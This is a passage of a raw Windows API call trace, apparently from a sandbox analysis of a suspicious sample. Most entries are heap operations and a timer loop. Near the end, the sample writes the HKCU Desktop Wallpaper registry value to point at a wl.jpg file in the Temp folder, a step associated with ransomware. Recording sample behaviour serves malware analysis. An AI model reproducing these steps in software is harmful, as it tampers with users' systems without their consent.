Size=0x8) returned 0x2a72368 [0250.109] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eabe0 [0250.109] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0250.109] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0250.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0250.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70e0 [0250.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0250.110] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eabe0 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70e0 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0250.110] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0250.110] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0250.111] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0250.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0250.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0250.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0250.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0250.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0250.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0250.111] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0250.111] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0250.111] timeGetTime () returned 0x117e660 [0250.111] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.111] Sleep (dwMilliseconds=0xa) [0250.201] timeGetTime () returned 0x117e6bd [0250.201] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.201] Sleep (dwMilliseconds=0xa) [0250.262] timeGetTime () returned 0x117e6fb [0250.262] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.263] Sleep (dwMilliseconds=0xa) [0250.311] timeGetTime () returned 0x117e72a [0250.311] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.311] Sleep (dwMilliseconds=0xa) [0250.336] timeGetTime () returned 0x117e73a [0250.336] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.336] Sleep (dwMilliseconds=0xa) [0250.431] timeGetTime () returned 0x117e798 [0250.431] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.431] Sleep (dwMilliseconds=0xa) [0250.455] timeGetTime () returned 0x117e7b7 [0250.455] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.455] Sleep (dwMilliseconds=0xa) [0250.483] timeGetTime () returned 0x117e7d6 [0250.483] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.483] Sleep (dwMilliseconds=0xa) [0250.497] timeGetTime () returned 0x117e7e6 [0250.497] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0250.497] TranslateMessage (lpMsg=0x8cf798) returned 0 [0250.497] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0250.497] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0250.497] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0250.498] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.498] Sleep (dwMilliseconds=0xa) [0250.512] timeGetTime () returned 0x117e7f5 [0250.512] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.512] Sleep (dwMilliseconds=0xa) [0250.528] timeGetTime () returned 0x117e805 [0250.528] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.528] Sleep (dwMilliseconds=0xa) [0250.552] timeGetTime () returned 0x117e815 [0250.552] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.552] Sleep (dwMilliseconds=0xa) [0250.578] timeGetTime () returned 0x117e834 [0250.578] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.578] Sleep (dwMilliseconds=0xa) [0250.591] timeGetTime () returned 0x117e844 [0250.591] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.591] Sleep (dwMilliseconds=0xa) [0250.606] timeGetTime () returned 0x117e853 [0250.606] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.606] Sleep (dwMilliseconds=0xa) [0250.622] timeGetTime () returned 0x117e863 [0250.622] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.622] Sleep (dwMilliseconds=0xa) [0250.637] timeGetTime () returned 0x117e872 [0250.637] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.637] Sleep (dwMilliseconds=0xa) [0250.656] timeGetTime () returned 0x117e882 [0250.656] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.656] Sleep (dwMilliseconds=0xa) [0250.669] timeGetTime () returned 0x117e892 [0250.669] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.669] Sleep (dwMilliseconds=0xa) [0250.686] timeGetTime () returned 0x117e8a1 [0250.686] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.686] Sleep (dwMilliseconds=0xa) [0250.701] timeGetTime () returned 0x117e8b1 [0250.701] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.701] Sleep (dwMilliseconds=0xa) [0250.716] timeGetTime () returned 0x117e8c1 [0250.716] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.716] Sleep (dwMilliseconds=0xa) [0250.731] timeGetTime () returned 0x117e8d0 [0250.731] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.731] Sleep (dwMilliseconds=0xa) [0250.747] timeGetTime () returned 0x117e8e0 [0250.747] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.747] Sleep (dwMilliseconds=0xa) [0250.764] timeGetTime () returned 0x117e8f0 [0250.764] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.764] Sleep (dwMilliseconds=0xa) [0250.794] timeGetTime () returned 0x117e90f [0250.794] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.794] Sleep (dwMilliseconds=0xa) [0250.856] timeGetTime () returned 0x117e94d [0250.856] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.856] Sleep (dwMilliseconds=0xa) [0250.872] timeGetTime () returned 0x117e95d [0250.872] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.872] Sleep (dwMilliseconds=0xa) [0250.889] timeGetTime () returned 0x117e96c [0250.889] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.889] Sleep (dwMilliseconds=0xa) [0250.903] timeGetTime () returned 0x117e97c [0250.903] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.903] Sleep (dwMilliseconds=0xa) [0250.919] timeGetTime () returned 0x117e98c [0250.919] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.919] Sleep (dwMilliseconds=0xa) [0250.934] timeGetTime () returned 0x117e99b [0250.934] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.934] Sleep (dwMilliseconds=0xa) [0250.956] timeGetTime () returned 0x117e9ab [0250.956] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0250.956] Sleep (dwMilliseconds=0xa) [0251.044] timeGetTime () returned 0x117ea09 [0251.044] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.044] Sleep (dwMilliseconds=0xa) [0251.095] timeGetTime () returned 0x117ea38 [0251.095] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0251.095] Sleep (dwMilliseconds=0xa) [0251.138] timeGetTime () returned 0x117ea66 [0251.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0251.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0251.138] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5a8 [0251.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab458 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0251.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab470 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0251.138] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0251.138] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab5c0 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0251.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0251.139] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4b8 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab500 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0251.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab590 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0251.139] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf438 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x50) returned 0x29eace8 [0251.139] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0251.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0251.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0251.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab638 | out: hHeap=0x2af0000) returned 1 [0251.139] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4b8 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4a0 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb0) returned 0x29f7878 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eace8 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4a0 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab698 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0251.140] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73568 [0251.140] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0251.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0251.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0251.141] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0251.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab488 [0251.141] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab488 | out: hHeap=0x2af0000) returned 1 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0251.141] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x3c0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0251.141] RegSetValueExW (in: hKey=0x3c0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0251.141] RegCloseKey (hKey=0x3c0) returned 0x0 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73568 | out: hHeap=0x2af0000) returned 1 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0251.141] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab5a8 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab470 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab650 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6e0 | out: hHeap=0x2af0000) returned 1 [0251.142] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0251.142] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0251.142] CharUpperBuffW (in: lpsz="A0F00F04C39", cchLength=0xb | out: lpsz="A0F00F04C39") returned 0xb [0251.142] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 